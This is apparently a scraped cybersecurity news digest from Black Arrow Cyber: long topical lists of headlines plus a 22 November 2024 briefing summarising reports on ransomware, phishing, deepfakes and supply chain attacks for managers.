Scammers use 'you're fired' lures in phishing campaign • The Register

“Sad announcement” email implies your friend has died | Malwarebytes

OpenSea NFT Phishers Aim to Drain Crypto Wallets

Email Is Insecure: 4 Reasons I Avoid It Like the Plague

Three-Quarters of Black Friday Spam Emails Identified as Scams - Infosecurity Magazine

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Business Email Compromise Scams: What They Are, and How to Avoid Them | Ogletree, Deakins, Nash, Smoak & Stewart, P.C. - JDSupra

Other Social Engineering

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

How to recognize employment fraud before it becomes a security issue - Help Net Security

Meta Finally Breaks Its Silence on Pig Butchering | WIRED

Bangkok busts SMS Blaster sending 1 million scam texts from a van

North Korea Deploying Fake IT Workers in China, Russia, Other Countries - SecurityWeek

Artificial Intelligence

Cloned customer voice beats bank security checks - BBC News

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

Over a Third of Firms Struggling With Shadow AI - Infosecurity Magazine

AI in cyber security: Not yet autonomous, but the time to prepare is now

British spies to ramp up fight against Russian cyber threats with launch of cutting-edge... - LBC

Russia plotting to use AI to enhance cyber-attacks against UK, minister will warn | Russia | The Guardian

Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters

Faux ChatGPT, Claude API Packages Deliver JarkaStealer

AI is the latest tool in the cyber security cat-and-mouse game - Fast Company

AI Used for Good and Bad — Like Making Trickier Malware, Says Report

Teaching AI to Hack: Researchers Demonstrate ChatGPT's to Ethically Hack Linux & Windows

Deepfakes of Elon Musk are contributing to billions of dollars in fraud losses in the U.S. - CBS News

Organisations unprepared for the AI onslaught must do these 4 things | ZDNET

'Tis the season for website cloning tools, RCEs and AI phishing lures | SC Media

2FA/MFA

‘Adversary in the middle attacks’ are becoming hackers’ go-to method to bypass MFA | ITPro

Hackers Update Tactics to Bypass Multifactor Authentication - Petri IT Knowledgebase

Malware

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

2024 saw a surge in malicious free VPN apps | TechRadar

Russian Hackers Deploy HATVIBE and CHERRYSPY Malware Across Europe and Asia

Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media

Salt Typhoon hackers backdoor telcos with new GhostSpider malware

What cyber attacks are bots commonly associated with?

Aggressive Chinese APT Group Targets Governments with New Backdoors - Infosecurity Magazine

Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries

Skimmer Malware Targets Magento Sites Ahead of Black Friday

APT-K-47 Uses Hajj-Themed Lures to Deliver Advanced Asyncshell Malware

Hackers abuse Avast anti-rootkit driver to disable defences

Researchers Uncover Malware Using BYOVD to Bypass Antivirus Protections

IoT Device Traffic Up 18% as Malware Attacks Surge 400% - Infosecurity Magazine

The source code of Banshee Stealer leaked online

Faux ChatGPT, Claude API Packages Deliver JarkaStealer

How Facebook and Instagram Malware Works (and How to Spot It Before You Click)

Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels

AI Used for Good and Bad — Like Making Trickier Malware, Says Report

APT-C-60 Hackers Exploit StatCounter and Bitbucket in SpyGlace Malware Campaign

Gaming Engines: An Undetected Playground for Malware Loaders - Check Point Research

Bots/Botnets

What cyber attacks are bots commonly associated with?

Growing Matrix Botnet Poses Escalating Global Threat

Mobile

Why you should power off your phone once a week - according to the NSA | ZDNET

One Down, Many to Go with Pre-Installed Malware on Android | Electronic Frontier Foundation

Denial of Service/DoS/DDoS

Here’s how simple it is for script kiddies to stand up DDoS services | CyberScoop

Is Your Router In The Matrix—35 Million Devices Under Blue Pill Attack

Internet of Things – IoT

My Car Knows My Secrets, and I'm (Mostly) OK With That

Growing Matrix Botnet Poses Escalating Global Threat

IoT Device Traffic Up 18% as Malware Attacks Surge 400% - Infosecurity Magazine

Data Breaches/Leaks

Prison layouts reportedly leaked on dark web in data breach - BBC News

Data leaks from websites built on Microsoft Power Pages, including 1.1 million NHS records

New York Fines Geico and Travelers $11 Million Over Data Breaches - SecurityWeek

A US soldier is suspected of being behind the massive Snowflake data leak | CSO Online

Data broker leaves 600K+ sensitive files exposed online • The Register

TfL cyber attack: Independent review will examine huge hack and response | The Standard

Military dating site leaves database with 1M records exposed | Biometric Update

HIA: Survivors awarded £30,000 after data breach - BBC News

Zello asks users to reset passwords after security incident

Hack Against Andrew Tate Continues With Leak Of Staff Chats

Hackers Breach Andrew Tate's Online 'University,' Exposing 800,000 Users

Organised Crime & Criminal Actors

The rise and fall of the 'Scattered Spider' hackers | TechCrunch

Major cyber crime crackdowns signal shift in global cyber security strategies

Interpol: Major cyber crime operation nets 1,006 suspects – DataBreaches.Net

Authorities disrupt major cyber crime operation, 1000+ suspects arrested - Help Net Security

US alleges man is cyber crook with distaste for opsec • The Register

DoJ seized credit card marketplace PopeyeTools

DOJ: Man hacked networks to pitch cyber security services

'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

North Korean hackers have stolen billions in crypto by posing as VCs, recruiters and IT workers | TechCrunch

Crypto Hacks Drop 15% Year-to-Date, over $70 Million Lost in November

Deepfakes of Elon Musk are contributing to billions of dollars in fraud losses in the U.S. - CBS News

OpenSea NFT Phishers Aim to Drain Crypto Wallets

Insider Risk and Insider Threats

83% of organisations reported insider attacks in 2024

Human Factors in Cyber Security in 2024 | UpGuard

Insurance

Cyber attacks cost British businesses $55 billion in past five years, broker says | Reuters

Howden urges insurers to tackle cyber cover penetration gap as 52% report attack in last five years | Insurance Times

Supply Chain and Third Parties

Rising cyber threat driven by Single Point of Failure risk

Blue Yonder ransomware attack disrupts supply chains across UK and US

Wake Up And Smell The Ransomware—Starbucks Impacted By Cyber Attack

Supply chain vendor Blue Yonder succumbs to ransomware • The Register

Outages

Microsoft CEO Nadella Calls for 'Culture Change' After Security Lapses - Business Insider

Rising cyber threat driven by Single Point of Failure risk

Microsoft 365 outage impacts Exchange Online, Teams, Sharepoint

Microsoft aims for better Windows security • The Register

CrowdStrike still doesn’t know cost of Falcon flame-out • The Register

Encryption

Albanian Drug Smugglers Busted After Cops Decrypt Comms - Infosecurity Magazine

Linux and Open Source

Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media

Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels

Passwords, Credential Stuffing & Brute Force Attacks

Passwords are giving way to better security methods – until those are hacked too, that is | US small business | The Guardian

I Ran a Password Audit and Was Surprised How Many Outdated Passwords I Have

Zello asks users to reset passwords after security incident

Stop Using Your Passwords—1Password And Google Warn

Social Media

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

Meta Finally Breaks Its Silence on Pig Butchering | WIRED

Meta Shutters Two Million Scam Accounts in Pig Butchering Crackdown - Infosecurity Magazine

How Facebook and Instagram Malware Works (and How to Spot It Before You Click)

Regulations, Fines and Legislation

The EU Cyber Resilience Act: Implications for Companies | Hogan Lovells - JDSupra

New York Fines Geico and Travelers $11 Million Over Data Breaches - SecurityWeek

EC opens new infringement procedures against Bulgaria and 22 other EU countries over cyber security rules - Българска национална телевизия

EU: Cyber Resilience Act published in EU Official Journal | DLA Piper - JDSupra

HIA: Survivors awarded £30,000 after data breach - BBC News

US senators propose mandated MFA, encryption in healthcare • The Register

Opportunities for Regulatory Harmonization Under Trump's Deregulation Agenda

Telecoms Security Act Compliance... - Analysis - Mobile News

Cyber security bill passes parliament - Security - iTnews

Victims Must Disclose Ransom Payments Under Australian Law

Models, Frameworks and Standards

The EU Cyber Resilience Act: Implications for Companies | Hogan Lovells - JDSupra

EC opens new infringement procedures against Bulgaria and 22 other EU countries over cyber security rules - Българска национална телевизия

EU: Cyber Resilience Act published in EU Official Journal | DLA Piper - JDSupra

Why Cyber Security Leaders Trust the MITRE ATT&CK Evaluations

Careers, Working in Cyber and Information Security

Practical strategies to build an inclusive culture in cyber security - Help Net Security

8 Tips for Hiring Neurodivergent Talent

Why IT Leaders Should Hire Veterans for Cyber Security Roles

How cyber security certification can drive business growth - Digital Journal

The Next Hot Cyber Security Skill for Your Resume? Empathy

Law Enforcement Action and Take Downs

The rise and fall of the 'Scattered Spider' hackers | TechCrunch

Major cyber crime crackdowns signal shift in global cyber security strategies

Interpol: Major cyber crime operation nets 1,006 suspects – DataBreaches.Net

Authorities disrupt major cyber crime operation, 1000+ suspects arrested - Help Net Security

Bangkok busts SMS Blaster sending 1 million scam texts from a van

US alleges man is cyber crook with distaste for opsec • The Register

DoJ seized credit card marketplace PopeyeTools

Telco engineer spying on employer for Beijing gets 4 years • The Register

US Citizen Sentenced for Spying on Behalf of China's Intelligence Agency

Calls for a ‘more offensive’ police approach to cyber attacks and a stronger national tech strategy - Policing Insight

Albanian Drug Smugglers Busted After Cops Decrypt Comms - Infosecurity Magazine

DOJ: Man hacked networks to pitch cyber security services

'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld

Police bust pirate streaming service making €250 million per month


Misinformation, Disinformation and Propaganda

Google Deindexes Chinese Propaganda Network - Infosecurity Magazine

Google blocked 1000 pro China websites from services • The Register

'Operation Undercut' Adds to Russia Influence Campaigns

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters

“Cyber war is now a daily reality”, UK government minister says

UK calls for stronger NATO cyber defences

Wire cutters: how the world’s vital undersea data cables are being targeted | Telecoms | The Guardian

5th Generation War: A War Without Borders and its Impact on Global Security - Modern Diplomacy

Nation State Actors

China

The Cyberthreats from China are Ongoing: U.S. Officials - Security Boulevard

Chinese Hackers Use GHOSTSPIDER Malware to Hack Telecoms Across 12+ Countries

Chinese vessel 'sabotaged' Baltic deep sea cables and may have been under orders from Russia

Satellite Image Shows Chinese Ship Suspected of Sabotage in 'NATO Lake' - Newsweek

Salt Typhoon’s cyber storm reaches beyond US telcos • The Register

Chinese hackers preparing for conflict, says US cyber official | The Straits Times

Novel WolfsBane backdoor leveraged in Chinese attacks against Linux systems | SC Media

China's Cyber Offensives Helped by Private Firms, Academia

Accident or sabotage? American and European officials disagree as key undersea cables are cut | CNN

Google Deindexes Chinese Propaganda Network - Infosecurity Magazine

China's telco attacks mean 'thousands' of boxes compromised • The Register

Top senator calls Salt Typhoon “worst telecom hack in our nation’s history” - The Washington Post

CrowdStrike identifies new China hackers breaching telecom networks

NSA Director Wants Industry to Disclose Details of Telecom Hacks - Bloomberg

T-Mobile Engineers Spotted Hackers Running Commands on Routers - Bloomberg

Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions | Trend Micro (US)

US must counter new Chinese cyber attacks. Remember how it lost nuclear monopoly?

China Concealing State, Corporate & Academic Assets For Offensive Attacks

China’s Surveillance State Is Selling Citizen Data as a Side Hustle | WIRED

Aggressive Chinese APT Group Targets Governments with New Backdoors - Infosecurity Magazine

Google blocked 1000 pro China websites from services • The Register

Telco engineer spying on employer for Beijing gets 4 years • The Register

US Citizen Sentenced for Spying on Behalf of China's Intelligence Agency


Imagine a land where algorithms don't ruin the Internet • The Register

Russia

Russia ‘aggressive’ and ‘reckless’ in cyber realm and threat to Nato, UK minister to warn | UK news | The Guardian

Britain should prepare for 'aggressive and reckless' Russian cyber attacks, minister warns

UK warns of imminent Russian cyber attacks targeting NATO amid Ukraine war | World News - Hindustan Times

Chinese vessel 'sabotaged' Baltic deep sea cables and may have been under orders from Russia

Russian Cyberespionage Group Hit 60 Victims in Asia, Europe - SecurityWeek

Russian Spies Jumped From One Network to Another Via Wi-Fi in an Unprecedented Hack | WIRED

Nato countries are in a ‘hidden cyber war’ with Russia, says Liz Kendall | The Standard

Britain, NATO must stay ahead in 'new AI arms race', says UK minister | Reuters

Nato countries in 'hidden cyber war' with Russia, minister warns | ITV News

Russian hybrid attacks may lead to NATO invoking Article 5, says German intel chief | Reuters

UK closely monitoring Russian spy ship as it passes near British Isles — 'undersea cables are a shared concern' says Ministry of Defence | Tom's Hardware

Accident or sabotage? American and European officials disagree as key undersea cables are cut | CNN

RomCom Exploits Zero-Day Firefox and Windows Flaws in Sophisticated Cyber Attacks

Firefox and Windows zero-days exploited by Russian RomCom hackers

Is Your Router In The Matrix—35 Million Devices Under Blue Pill Attack

Russia-linked APT TAG-110 targets Europe and Asia - Security Affairs

'Operation Undercut' Adds to Russia Influence Campaigns

CyberVolk analysis explores ransomware, hacktivism interconnections | SC Media

CISA says BianLian ransomware now focuses only on data theft

Here’s how simple it is for script kiddies to stand up DDoS services | CyberScoop

Pro-Russian Hacktivists Launch Branded Ransomware Operations - Infosecurity Magazine

North Korea

North Korean Hackers Steal $10M with AI-Driven Scams and Malware on LinkedIn

North Korea Deploying Fake IT Workers in China, Russia, Other Countries - SecurityWeek

North Korean hackers have stolen billions in crypto by posing as VCs, recruiters and IT workers | TechCrunch

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

APT-C-60 Hackers Exploit StatCounter and Bitbucket in SpyGlace Malware Campaign

Man warns 'this is just the beginning' after cyber attack on Merseyside Police - Liverpool Echo

Tools and Controls

VPN Vulnerabilities Drive Nearly 30% Of Q3 Ransomware Attacks

2024 saw a surge in malicious free VPN apps | TechRadar

How to recognize employment fraud before it becomes a security issue - Help Net Security

AI in cyber security: Not yet autonomous, but the time to prepare is now

Incident response diplomacy: UK to launch new capability to help attacked allies | The Record from Recorded Future News

Email Phishing and DMARC Statistics - Security Boulevard

Ransomware Groups Targeting VPNs for Initial Access: Report | MSSP Alert

Microsoft Teams monitoring tips for admins | TechTarget

Cyber security’s oversimplification problem: Seeing AI as a replacement for human agency | CSO Online

What is compliance risk? | Definition from TechTarget

Is Cyber Threat Intelligence Worthless? - Security Boulevard

Machine Learning in Cyber Security: Harnessing the Power of Five AI Tribes - Security Boulevard

CIOs warned of AI over-reliance in cyber security defence

AI Used for Good and Bad — Like Making Trickier Malware, Says Report

Modern workplaces increasingly resemble surveillance zones • The Register

The role of data recovery in cyber resilience

AI is the latest tool in the cyber security cat-and-mouse game - Fast Company

Businesses prioritize cyber security in digital transformation: GSMAi

Data Security Best Practices: 7 Tips to Crush Bad Actors | MSSP Alert

Cloudflare says it lost 55% of logs pushed to customers for 3.5 hours

DOJ: Man hacked networks to pitch cyber security services

'Hacker' breaks into gym to get hired, gets arrested instead | PCWorld

The ‘Great IT Rebrand’: Restructuring IT for business success | CIO

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

- Automotive

- Construction

- Critical National Infrastructure (CNI)

- Defence & Space

- Education & Academia

- Energy & Utilities

- Estate Agencies

- Financial Services

- FinTech

- Food & Agriculture

- Gaming & Gambling

- Government & Public Sector (including Law Enforcement)

- Health/Medical/Pharma

- Hotels & Hospitality

- Insurance

- Legal

- Manufacturing

- Maritime & Shipping

- Oil, Gas & Mining

- OT, ICS, IIoT, SCADA & Cyber-Physical Systems

- Retail & eCommerce

- Small and Medium Sized Businesses (SMBs)

- Startups

- Telecoms

- Third Sector & Charities

- Transport & Aviation

- Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness, and linking to or reposting external content does not endorse any service or product; likewise, we are not responsible for the security of external links.


Black Arrow Cyber Threat Intelligence Briefing 22 November 2024

Black Arrow Cyber Threat Intelligence Briefing 22 November 2024:

-Cyber Security Dominates Concerns Among the C-Suite, Small Businesses and the Nation

-Cyber Criminals Don’t Take Holidays Warns Expert

-The Urgent and Critical Need to Prioritise Mobile Security

-Companies Take Over Seven Months to Recover from Cyber Incidents

-Data is the New Uranium – Incredibly Powerful and Amazingly Dangerous

-‘Scam Yourself’ Attacks Just Increased Over 600% - Here’s What to Look For

-60% of Emails with QR Codes Classified as Spam or Malicious

-Coalition Highlights 68% Surge in Ransomware Claims Severity, as Active Ransomware Groups Increase 56%

-One Deepfake Digital Identity Attack Strikes Every Five Minutes

-Supply Chain Attacks Up Over 400 Percent Since 2021

-Rethinking Cyber Security from Cost Centre to Value Driver

-Majority of UK Businesses Lack Readiness for Rising AI-Led Phishing Attacks, Reveals Survey

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Cyber Security Dominates Concerns Among the C-Suite, Small Businesses and the Nation

Cyber security is now the top concern for organisations globally, with the 2024 Allianz Risk Barometer naming cyber events as the number one business risk. Gartner forecasts a 15% increase in information security spending by 2025, reaching $212 billion. Small businesses are also vulnerable, with 60% ranking cyber security risks as major concerns. Generative AI introduces new threats, and Gartner predicts that by 2027, 17% of cyber attacks and data leaks will involve generative AI.

Cyber Criminals Don’t Take Holidays Warns Expert

Semperis has found that cyber attacks during holidays and weekends pose a significant risk to businesses because many are underprepared to handle incidents outside of standard working hours. These risks intensify when an organisation’s security capability is reduced on holidays and weekends. The report highlighted that identity-related attacks are a major concern, yet a quarter of respondents feel they lack the expertise to protect against them, and over 22% don't have an identity recovery plan in place.

The Urgent and Critical Need to Prioritise Mobile Security

Recent findings reveal that mobile security threats are a top concern for organisations. With over 55% of organisations increasing their mobile device users and more than 70% of employees using smartphones for work tasks, threats like mobile phishing and malware are intensifying. The report indicates that 82% of phishing websites are designed for mobile users, and 200 malicious apps on Google Play have been downloaded 8 million times. Despite this, many organisations face challenges in mitigating mobile risks due to device diversity and user control, highlighting a critical need for improved mobile security measures.

Companies Take Over Seven Months to Recover from Cyber Incidents

A new report reveals that organisations are underestimating recovery times from cyber incidents, with actual recovery averaging over seven months, 25% longer than anticipated. This gap widens to nearly 11 months for companies reducing cyber security investments. Despite efforts like implementing stronger security measures (43%) and offering additional employee training (41%), nearly half of organisations are rethinking how they use existing cyber security tools. The study also highlights a shift towards shared responsibility, with platform engineering teams and app developers increasingly held accountable alongside traditional roles like Chief Information Security Officers (CISOs) and CIOs.

Data is the New Uranium – Incredibly Powerful and Amazingly Dangerous

Recent insights from Chief Information Security Officers (CISOs) indicate that data-related risks are becoming a primary concern for organisations. The vast and dispersed nature of data storage has led many CISOs to feel that the cost of managing data now outweighs its value. There’s a growing perception that the business proposition of ‘big data’ is shifting from a net positive to a net negative. This underscores the urgent need for organisations to manage data carefully and to be fully aware of the risks and costs associated with potential breaches.

‘Scam Yourself’ Attacks Just Increased Over 600% - Here’s What to Look For

Gen, the company behind Norton and Avast, reports a 614% surge in ‘scam yourself’ cyber attacks in the third quarter compared to the second. These scams leverage social engineering to trick users into downloading malware themselves. Notably, over two million people worldwide were targeted by fake captcha scams in the past quarter. Despite increased vigilance, users remain vulnerable to fake updates, deceptive fixes, and counterfeit tutorials that often instruct them to disable antivirus software or input commands that compromise security.

60% of Emails with QR Codes Classified as Spam or Malicious

Cisco Talos has found that 60% of emails containing QR codes are classified as spam, with some being malicious and targeting users with phishing or credential theft. Despite representing only about one in 500 global emails, these QR code emails effectively bypass security filters. Attackers use deceptive methods like blending QR codes into attractive designs. The report emphasises the importance of ‘defanging’ QR codes to neutralise threats, and advises treating QR codes with the same caution as unknown URLs. Users should be vigilant when scanning QR codes and avoid entering credentials into unknown sites linked via QR codes.

Coalition Highlights 68% Surge in Ransomware Claims Severity, as Active Ransomware Groups Increase 56%

Coalition's latest report reveals a 68% surge in the severity of ransomware claims, with average losses escalating to $353,000. Searchlight Cyber has found a 56% increase in active ransomware groups in the first half of 2024, tracking 73 groups compared to 46 last year. This rise indicates that the fight against ransomware is far from over. The impact of ransomware has intensified, particularly affecting larger companies. Coalition also notes a rise in significant cyber risk aggregation events (which cause widespread loss to other organisations) disrupting a substantial proportion of healthcare firms and auto dealerships with revenues over $100 million. Business email compromise remains the most common cyber incident, increasing by 4% and constituting nearly one-third of all cyber insurance claims. Meanwhile, claims severity overall rose by 14%.

One Deepfake Digital Identity Attack Strikes Every Five Minutes

Entrust has reported that deepfake attacks are occurring every five minutes in 2024, posing a significant threat to digital identity verification systems. The report found that deepfakes account for 24% of fraudulent attempts to bypass motion-based biometric checks used by banks and service providers. In contrast, only 5% of these attacks target basic selfie-based authentication methods. The growing accessibility of generative AI technology is enabling fraudsters to circumvent advanced security measures. Entrust highlighted that organisations must proactively adapt their security strategies, as these evolving threats are pervasive across all sectors.

Supply Chain Attacks Up Over 400% Since 2021

Cowbell Insurance has found that supply chain attacks have surged by 431% since 2021. Large enterprises with over $50 million in revenue are 2.5 times more likely to face cyber incidents. Manufacturing is the most vulnerable sector due to its reliance on automation and exposure to intellectual property threats. Public administration and educational services also face elevated risks, with a 70% increase in attacks on educational institutions over the past year. The report identifies five risky technology categories: operating systems, content management tools, virtualisation technologies, server-side technologies, and business applications. No business is immune to cyber threats and the consequences can be devastating.

Rethinking Cyber Security from Cost Centre to Value Driver

A University of Maryland study found that cyber attacks occur every 39 seconds, amounting to 2,244 attacks daily. Cybersecurity Ventures predicts annual cyber damages will reach $10.5 trillion by 2025. Despite these alarming figures, many organisations treat cyber security as a minimal compliance exercise. Leadership must transform this approach by integrating cyber security into business strategy, fostering a culture of trust and resilience. By prioritising employee training and leveraging technologies like artificial intelligence, companies can enhance customer loyalty, avoid regulatory issues, and shift cyber security from a cost centre to a value driver.

Majority of UK Businesses Lack Readiness for Rising AI-Led Phishing Attacks, Reveals Survey

Vodafone Business has found that most UK businesses are unprepared for the rapid rise in AI-led phishing attacks, which have increased 60% globally over the past year. Despite over three quarters of business leaders expressing confidence in employees' ability to detect scams, only a third could identify fraudulent communications. The report highlighted that over half of UK businesses lack a response plan for AI-driven phishing, and younger employees are particularly susceptible, with nearly half aged 18 to 24 not updating passwords in over a year.

Sources:

https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/

https://www.emergingrisks.co.uk/cyber-criminals-dont-take-holidays-warns-expert/

https://www.securityweek.com/the-urgent-and-critical-need-to-prioritize-mobile-security/

https://www.infosecurity-magazine.com/news/companies-seven-months-recover/

https://www.theregister.com/2024/11/20/data_is_the_new_uranium/

https://www.zdnet.com/article/scam-yourself-attacks-just-increased-over-600-heres-what-to-look-for/

https://www.infosecurity-magazine.com/news/60-emails-qr-codes-spam-malicious/

https://www.reinsurancene.ws/coalition-highlights-68-surge-in-ransomware-claims-severity/

https://securityintelligence.com/news/research-finds-56-percent-increase-active-ransomware-groups/

https://www.infosecurity-magazine.com/news/deepfake-identity-attack-every/

https://betanews.com/2024/11/21/supply-chain-attacks-up-over-400-percent-since-2021/

https://www.forbes.com/councils/forbesfinancecouncil/2024/11/18/rethinking-cybersecurity-from-cost-center-to-value-driver/

https://www.techmonitor.ai/technology/cybersecurity/majority-of-uk-businesses-lack-readiness-for-rising-ai-led-phishing-attacks-finds-survey


Governance, Risk and Compliance

Cyber security dominates concerns among the C-suite, small businesses and the nation

Rethinking Cyber Security From Cost Center To Value Driver

Cyber Threats, Changes in Climate, and Business Interruption are Insurance Buyers’ and Sellers’ Top Risk Concerns, Says New Munich Re/Triple-I Survey | Business Wire

So, you don’t have a chief information security officer? 9 signs your company needs one | CSO Online

Cyber criminals don’t take holidays warns expert

Chris Inglis: Why cyber security success hinges on strategic choices, not just tech | SC Media

Data is the new uranium – both powerful and dangerous • The Register

FINMA Risk Monitor 2024: Principal risks for the financial sector and uncertainties due to geopolitical tensions | FINMA

Cyber Security is Everyone’s Responsibility - Security Boulevard

Overcoming the cyber paradox: Shrinking budgets – growing threats | Computer Weekly

Hackers Aren’t Cutting Back, Why is Your Security Budget?

Applying the Enterprise Risk Mindset to Navigate Cyber Security Threats - New Risk Mindset Series | Mayer Brown - JDSupra

Full recovery from breaches takes longer than expected - Help Net Security

Google report shows CISOs must embrace change to stay secure - Help Net Security

Soaring cyber risks: Large enterprises, supply chains and key industries in the crosshairs

Emerging Security Practices in Digital Finance: By Shiv Nanda

Poor cyber hygiene enabled nearly 30% of cyber attacks last quarter | StateScoop

Insights from Cohesity on cyber resilience as a technical team sport - SiliconANGLE

Interconnectivity and cyber risk: A double-edged sword - IT Security Guru

We Can Do Better Than Free Credit Monitoring After a Breach

Breaches Don't Have to Be Disasters

CISOs can now obtain professional liability insurance | CyberScoop

Experts warn businesses of escalating cyber security threats

CISOs Look to Establish Additional Leadership Roles - Security Boulevard


Threats

Ransomware, Extortion and Destructive Attacks

Armis: Triple Extortion Attacks Becoming More Common | SC Media UK

Research finds 56% increase in active ransomware groups

Ransomware gang Akira leaks unprecedented number of victims’ data in one day

Ransomware is doubling down—What you need to know about the recent surge - Security Boulevard

Akira Ransomware Racks Up 30+ Victims in a Single Day

Cloud ransomware threats rise, targeting S3 & Azure

FBI says BianLian based in Russia, moving from ransomware attacks to extortion

Ransomware Evolution: From Triple-Quadruple Extortion to RaaS - Security Boulevard

Coalition highlights 68% surge in ransomware claims severity - Reinsurance News

Ransomware Groups Use Cloud Services For Data Exfiltration - Infosecurity Magazine

Hibernation is Over? Akira Ransomware: Published Over 30 New Victims on their DLS – DataBreaches.Net

Ransomware attacks primarily caused by poor cyber hygiene | SC Media

Cyber insurers address ransom reimbursement policy concerns | TechTarget

Ransomware Gangs on Recruitment Drive for Pen Testers - Infosecurity Magazine

Trellix report reveals evolving ransomware ecosystem trends

Security Bite: Ransomware groups surge in Q3 2024, with shifting dominance - 9to5Mac

Ransomware Attacks On Healthcare Sector Surge In 2024

Linux Variant of Helldown Ransomware Targets VMware

Helldown ransomware exploits Zyxel VPN flaw to breach networks

Alleged Russian Phobos ransomware administrator extradited to U.S., in custody | CyberScoop

Threat Landscape: Corporate Japan Its Own Worst Enemy in the Ransomware War | Nippon.com

Ransomware Victims

How the British Library hack has caused havoc for UK research

SafePay ransomware gang claims attack on UK's Microlise • The Register

Ransomware Attack on Oklahoma Medical Center Impacts 133,000 - SecurityWeek

Aspen Healthcare Services Announces Data Breach Following Ransomware Attack | Console and Associates, P.C. - JDSupra

Change Healthcare’s clearing house restored after 9 months • The Register

Cyber attack dents Arnold Clark’s profits but group will face ‘no further action’ – Car Dealer Magazine

Phishing & Email Based Attacks

Phishing emails increasingly use SVG attachments to evade detection

Communication platforms play a major role in data breach risks

You're Not Imagining It: Phishing Attacks Are Rampant

Why email security is still so bad today - 9to5Mac

Why AI alone can't protect you from sophisticated email threats - Help Net Security

Phishing Decoded: How Cyber Criminals Target You And How To Fight Back

Majority of UK businesses lack readiness for rising AI-led phishing attacks, reveals survey

60% of Emails with QR Codes Classified as Spam or Malicious - Infosecurity Magazine

One in five DocuSign spoofs targeting businesses found to be impersonations of regulatory agencies | SC Media

What is a whaling attack (whaling phishing)? | Definition from TechTarget

Job termination scam warns staff of phony Employment Tribunal decision | CSO Online

'Scattered Spider' scammers charged in sophisticated, million-dollar phishing scheme | Mashable

Microsoft Takes Phishing-as-a-Service Platform to Court

Fake Donald Trump Assassination Story Used in Phishing Scam - Infosecurity Magazine

No, Microsoft doesn't have dirt on you, it's just a sextortion scam - Neowin

Microsoft 365 Admin portal abused to send sextortion emails

North Korean IT Worker Network Tied to BeaverTail Phishing Campaign - Infosecurity Magazine

New phishing scam targeting companies with fake gov’t requests: What FBI says to do

Other Social Engineering

60% of Emails with QR Codes Classified as Spam or Malicious - Infosecurity Magazine

NCSC Warns UK Shoppers Lost £11.5m Last Christmas - Infosecurity Magazine

6 Reasons Social Engineering Is More Successful in Holiday Seasons | Mimecast

'Scam yourself' attacks just increased over 600% - here's what to look for | ZDNET

Malicious QR codes sent in the mail deliver malware | Malwarebytes

UK consumers losing more than ever to holiday scams | Computer Weekly

Fake Discount Sites Exploit Black Friday to Hijack Shopper Information

Security Alert: Fake Accounts Threaten Black Friday Gaming Sales - Security Boulevard

‘ClickFix’ Cyber-Attacks for Malware Deployment on the Rise - Infosecurity Magazine

Meta cracks down on millions of accounts it tied to pig-butchering scams | CyberScoop

Watch Out for Malicious QR Codes Sent Through the Mail

Cyber security chief warns Black Friday shoppers to be alert to scams | The Standard

Don't Fall for This Fake Image Generator and Its Political AI Slop

No, Microsoft doesn't have dirt on you, it's just a sextortion scam - Neowin

Active network of North Korean IT front companies exposed - Help Net Security

You Can Prevent Smishing Scams With These Features and Tricks

Artificial Intelligence

AI fuels 244% surge in digital forgeries, says new study

97% of organisations hit by Gen AI-related security breaches, survey finds

One Deepfake Digital Identity Attack Hits Every Five Minutes - Infosecurity Magazine

Google Issues New Security Cloaking Warning As Attackers Use AI In Attacks

Majority of UK businesses lack readiness for rising AI-led phishing attacks, reveals survey

76% of Cyber security Professionals Believe AI Should Be Heavily Regulated, New Study by StrongDM Finds

Largest Companies View AI as a Risk Multiplier

Terrorists Exploit AI for Propaganda and Operations, Exposing Critical Gaps in Tech Safeguards - The Media Line

Don't Fall for This Fake Image Generator and Its Political AI Slop

Phishing on the Rise: CUJO AI Blocks Over 12,000 Attacks per Minute

The limits of AI-based deepfake detection - Help Net Security

Microsoft Data Security Index annual report highlights evolving generative AI security needs | Microsoft Security Blog

OWASP Warns of Growing Data Exposure Risk from AI in New Top 10 List - Infosecurity Magazine

Supply chain threats highlight security gaps in LLMs and AI | TechRadar

AI in Cyber Crime: Hackers Exploiting OpenAI - Security Boulevard

Fake AI video generators infect Windows, macOS with infostealers

AI About-Face: 'Mantis' Turns LLM Attackers Into Prey

Artificial intelligence, international security, and the risk of war

Did you play Pokémon Go? You didn't know it, but you were training AI to map the world | ZDNET

Malware

Phishing emails increasingly use SVG attachments to evade detection

Don’t Hold Down The Ctrl Key—New Warning As Cyber Attacks Confirmed

Malicious QR codes sent in the mail deliver malware | Malwarebytes

